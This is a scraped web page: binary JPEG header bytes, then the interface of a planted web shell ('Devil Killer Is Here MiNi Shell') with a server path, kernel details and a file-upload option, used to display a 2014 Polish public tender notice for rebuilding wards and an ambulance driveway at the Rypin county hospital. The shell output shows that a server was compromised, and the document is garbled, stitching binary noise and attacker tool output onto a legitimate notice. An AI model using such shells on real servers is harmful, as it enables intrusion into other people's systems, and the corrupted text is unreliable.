JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/60959-N-2014.html

<p class="kh_header"><b>Rypin: Zaprojektuj i wybuduj zadanie pn. Budowa podjazdu dla karetek, przebudowa i modernizacja Izby Przyjęć, Oddziału położniczo - ginekologicznego, chirurgii ogólnej i urazowej Szpitala Powiatowego w Rypinie przy ulicy 3 Maja 2</b><br>
<b>Numer ogłoszenia: 60959 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. 3 Maja 2, 87-500 Rypin, woj. kujawsko-pomorskie, tel. 054 28054-53 do 55, faks 054 2805922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozrypin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektuj i wybuduj zadanie pn. Budowa podjazdu dla karetek, przebudowa i modernizacja Izby Przyjęć, Oddziału położniczo - ginekologicznego, chirurgii ogólnej i urazowej Szpitala Powiatowego w Rypinie przy ulicy 3 Maja 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie koncepcji, projektu budowlanego, uzyskanie niezbędnych pozwoleń i uzgodnień oraz sporządzenie projektów wykonawczych, a następnie wykonanie robót budowlano - modernizacyjnych na podstawie opracowanych projektów nw lokalizacji:
1. Izby przyjęć
2.Oddziału położniczo-ginekologicznego
3.Oddziału chirurgii ogólnej i urazowej
4.Budowa podjazdu dla karetek

ETAP I -  wykonanie koncepcji i kosztorysów  -  do 31.05.2014 r
Wykonanie koncepcji przebudowy i modernizacji wraz z kosztorysami w oparciu o założenia i wytyczne dostarczone i posiadane przez Zamawiającego . Wykonanie w dwóch egzemplarzach:  wersja papierowa i na płycie CD. Koncepcja musi być zatwierdzona przez rzeczoznawców branżowych .
Wykonanie koncepcji będzie podstawą do ubiegania się Zamawiającego  o dofinansowanie ze środków Unii Europejskiej - RPC województwa kujawsko - pomorskiego . W przypadku nie otrzymania ww dofinansowania, nie będą realizowane dalsze etapy zaplanowanej inwestycji tj. wykonanie projektu i jej budowa, a oferent - Wykonawca nie otrzyma wynagrodzenia za wykonaną i złożoną koncepcję i kosztorysy .

ETAP II - wykonanie projektów budowlanych, uzyskanie pozwolenia na budowę 
							                          do dnia 30.10.2014 r
Wykonanie projektu budowlanego i uzyskanie pozwolenia na budowę zadania pn. Budowa podjazdu dla karetek, przebudowa i modernizacja Izby przyjęć, Oddziału położniczo-ginekologicznego, Chirurgii  ogólne i urazowej Szpitala Powiatowego w Rypinie. 
Dokumentację należy wykonać w następujących ilościach ;
1.projekt budowlany, w tym przedmiar robót - 6 egzemplarzy plus wersja elektroniczna na płycie CD - 2 egzemplarze (rysunki w formacie dwg oraz PDF, tekst w formacie doc:Ms Word, przedmiar robót w formacie doc:MS Word lub xls
2.specyfikacje techniczne wykonania i odbioru robót po 3 egzemplarze plus wersja elektroniczna na płycie CD
3.projekty wykonawcze po 3 egzemplarze plus wersja elektroniczna na płycie CD 1 egz.  w formacie PDF.
4.Przekazanie dokumentacji (projekty budowlane, wykonawcze, specyfikacje techniczne wykonania i odbioru robót ) nastąpi w siedzibie Zamawiającego na podstawie protokołu odbioru po uzyskaniu pozwolenia na budowę . Projekty budowlane i projekty wykonawcze zatwierdzone przez rzeczoznawców branżowych

ETAP III - realizacja zadania:  Budowa podjazdu dla karetek, przebudowa i modernizacja Izby Przyjęć, Oddziału położniczo-ginekologicznego, chirurgii ogólnej i urazowej -  do dnia 31.03.2015 roku.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.00.00.00-7, 45.40.00.00-1, 45.31.00.00-3, 45.33.30.00-0, 45.33.00.00-9, 45.33.11.00-7, 45.33.12.10-1, 45.30.00.00-0, 45.23.32.20-7, 45.42.10.00-4, 45.26.26.00-7, 45.45.00.00-6, 45.11.12.91-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga zabezpieczenia wadium w niniejszym postępowaniu przetargowym w wysokości :  32460,00 PLN .
Formy wpłaty wadium:
2.	Wadium może być wnoszone w jednej lub kilku następujących formach;
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych
4)	gwarancjach ubezpieczeniowych
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z póź. zm. )
6)	wadium należy wnieść  najpóźniej do dnia składania ofert .
7)	wadium wniesione w pieniądzu należy wnieść przelewem na konto zamawiającego
8)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:  BGŻ  O/Rypin Nr  94 2030 0045 1110 0000 0186 9640
9)	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym .
10)	Za termin wniesienia wadium uważa się dzień wpływu środków na konto Zamawiającego.
11)	Wadium wnoszone w innej formie niż pieniądze należy złożyć w oryginale w kasie Zamawiającego od poniedziałku do piątku w godzinach 8.00 - 14.00.
12)	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a ustawy Pzp
13)	Wniesienie w wadium w pieniądzu będzie skuteczne, jeżeli w podanym  terminie znajdzie się na rachunku bankowym  Zamawiającego
14)	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium, zostanie wykluczony z postępowania, a jego  oferta zostanie uznana za odrzuconą
15)	Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 Pzp lub pełnomocnictw chyba ze wynika to z przyczyn nie leżących po jego stronie.
16)	Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy  albo nie wniósł wymaganego zabezpieczenia należytego wykonania umowy .

UWAGA: W przypadku wniesienia wadium w formie gwarancji lub poręczenia warunki zatrzymania wadium przez zamawiającego muszą być wyraźnie wymienione</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy :
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania, (załącznik Nr 3)

Ocena spełniania ww warunków, dokonana zostanie zgodnie z formułą spełnia - 
nie spełnia , w oparciu o informacje zawarte w dokumentach wyszczególnionych
w rozdziale  VI SIWZ . Z treści załączonych dokumentów  wynikać musi jednoznacznie, iż wymagane warunki Wykonawca spełnił .
Nie spełnienie chociażby jednego z ww warunków skutkować będzie  wykluczeniem Wykonawcy z postępowania .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia tj. wykonali w okresie ostatnich pięciu lat przed dniem upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę konstrukcyjną -  budowlaną w zakresie, których były  wykonane roboty  wymienione w opisie przedmiotu zamówienia, o wartości co najmniej  1.000.000,00 zł brutto (słownie: jeden milion  złotych) wraz z potwierdzeniem, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. (np. referencje, poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze  Wykonawca  nie jest w stanie uzyskać poświadczenia o którym mowa w niniejszym pkt )</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań odnośnie spełnienia tego warunku. Zamawiający uznaje za wystarczające złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik Nr  3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, którzy:
dysponują potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia; tj. dysponują co najmniej jedną osobą posiadającą  niżej wymienione uprawnienia bez ograniczeń  w poszczególnych zakresach  ;
a) konstrukcyjno - budowlane do projektowania i kierowania robotami  budowlanymi 
b) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  do projektowania i kierowania robotami budowlanymi,
c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do projektowania  i kierowania robotami budowlanymi , oraz pracownika z uprawnieniami dozorowymi na eksploatację urządzeń i instalacji niepalnych gazów medycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej, przy założeniu, że zapłata za wykonanie zamówienia dokonywana będzie zgodnie z treścią wzoru umowy stanowiącego (załącznik nr  8)  do niniejszej SIWZ, potwierdzonej opłaconą polisą ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o sumie ubezpieczenia  nie mniejszą niż 1.000.000,00 zł. ( słownie: jeden  milion  złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca, zobowiązany jest do wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej roboty konstrukcyjno -budowlanej w zakresie, których były wykonywane roboty wymienione w opisie przedmiotu zamówienia o wartości co najmniej 1.000.000,00 zł brutto oraz dołączenie poświadczenia, ze ta robota budowlana została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona .;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorysy szczegółowe, Dowód wpłaty wadium, Wypełniony formularz ofertowy, stanowiący załącznik nr 1a do SIWZ, zawierający w szczególności cenę ofertową brutto- ryczałtową oraz wykaz dotyczący podwykonawstwa (wypełniona tabelka w pkt 1 formularza ofertowego ). W sytuacji gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca przedstawia pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów  na okres korzystania z nich przy wykonaniu zamówienia .</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotne postanowienia umowy zawiera wzór umowy, stanowiący załącznik Nr 8 do SIW
2.Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności z uwzględnieniem zakazu określonego w art. 144 ust.1 ustawy   z dnia 29 stycznia 2004 r. Prawo zamówień  publicznych (tekst jednolity: Dz. U. z 2013r poz. 907 ze zm.)
1.Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności z uwzględnieniem zakazu określonego w art. 144 ust.1 PZP. 
2.Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy określonego w § 2  umowy.
3.Przewiduje się także możliwość ograniczenia zakresu rzeczowego przedmiotu umowy, w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy określonego w § 2  umowy.
4.Zmiany umowy są dopuszczalne, pod warunkiem, że zmiany te będą korzystne dla Zamawiającego i dotyczyć będą sytuacji, w których zmiany te: 
1)spowodują obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy,
2)spowodują poprawienie parametrów technicznych,
3)wynikają z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów,
4)wywołane są okolicznościami leżącymi po stronie Zamawiającego, w szczególności spowodowanymi jego sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
5)spowodowane zostały niemożliwą do przewidzenia w momencie zawarcia umowy okolicznością prawną, ekonomiczną lub techniczną, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującą brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - zamawiający dopuszcza możliwość zmiany umowy .

1.Zamawiający dopuszcza zmianę terminu realizacji zamówienia w przypadku ;
1)wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli  uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji,
2)konieczności  przeprowadzenia  dodatkowych, wcześniej nie wymaganych, a obecnie niezbędnych do przeprowadzenia ekspertyz technicznych, wymaganych dla prawidłowej realizacji przedmiotu zamówienia,
3)z przyczyn opóźnienia podpisania umowy dotacji z funduszy unii europejskiej
4)wystąpienia trudnych warunków atmosferycznych, uniemożliwiających rozpoczęcie lub kontynuowanie robót budowlanych, zapewniające prawidłową ich jakość, przez co rozumie się w szczególności utrzymywanie się temperatury powietrza poniżej minus 15 stopni C przez okres co najmniej 10 dni z rzędu oraz opady śniegu wynoszące nie mniej niż 200 mm wysokości przez okres co najmniej 7 dni z rzędu - dotyczy to wyłącznie robót budowlanych, wykonywanych na zewnątrz budynków.
5)wystąpienia konieczności wykonania robót dodatkowych, niezbędnych do wykonania przedmiotu zamówienia.
6.Zmiany umowy nie wymaga zmiana w wykazie osób wskazanych przez Wykonawcę w przedłożonej Zamawiającemu ofercie jako osoby posiadające określone uprawnienia (tj. uprawnienia, o których mowa w dziale VI pkt 1 ppkt 3 niniejszej specyfikacji istotnych warunków zamówienia), jeżeli Wykonawca wskaże w ich miejsce nowe osoby, które będą posiadały takie same uprawnienia. 

7.Umowa o podwykonawstwo zawarta z podwykonawcami lub dalszymi podwykonawcami musi zawierać postanowienia, odpowiadające niniejszym wymogom: 
1)	Wynagrodzenie podwykonawcy lub dalszego podwykonawcy będzie płatne w terminie nie dłuższym niż 14 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku potwierdzającego wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy dostawy, usługi lub roboty budowlanej,
2)Wynagrodzenie podwykonawcy lub dalszego podwykonawcy za zrealizowany zakres prac nie powinno być wyższe niż wynagrodzenie należne Wykonawcy za przedmiotowy zakres prac. Materiałem pomocniczym stosowanym w celu weryfikacji w/w wymogu może być kosztorys szczegółowy, składany przez Wykonawcę na zasadach określonych w niniejszej umowie,
3)Kary umowne w umowie dotyczące podwykonawstwa bądź dalszego podwykonawstwa nie mogą być wyższe niż te zawarte w umowie z Wykonawcą, 
4)Przedmiot umowy dotyczący podwykonawstwa bądź dalszego podwykonawstwa będzie tożsamy z przedmiotem niniejszego zamówienia publicznego - w celu weryfikacji w/w wymogu przedmiot umowy dotyczący podwykonawstwa bądź dalszego podwykonawstwa powinien być opisany poprzez odniesienie do dokumentacji projektowej, na podstawie której realizowane jest niniejsze zamówienie publiczne,
5)Umowa z podwykonawcą lub dalszym podwykonawcą nie będzie zawierała dłuższego terminu realizacji niż ta, którą Zamawiający zawarł z Wykonawcą, a termin umowy dotyczący podwykonawstwa nie może zagrażać dotrzymaniu terminu dotyczącego wykonania całego przedmiotu zamówienia,
6)W przypadku, gdy zakres realizowanych w ramach umowy o podwykonawstwo lub dalsze podwykonawstwo dotyczy prac, w odniesieniu do których przepisy prawne wymagają posiadania odpowiednich uprawnień, z umowy o podwykonawstwo bądź dalsze podwykonawstwo musi wynikać, iż podmiot realizujący te prace czyni zadość w/w wymaganiom, np. dysponuje osobami zdolnymi do wykonania zamówienia tj. posiadającymi odpowiednie uprawnienia itp.,
7)Umowa o podwykonawstwo bądź dalsze podwykonawstwo musi zawierać zapis dotyczący braku możliwości dokonania cesji wierzytelności bez uprzedniej akceptacji Wykonawcy i Zamawiającego lub dokonania zlecenia dalszego podwykonawstwa bez uprzedniej akceptacji Wykonawcy i Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozrypin.pl<br>
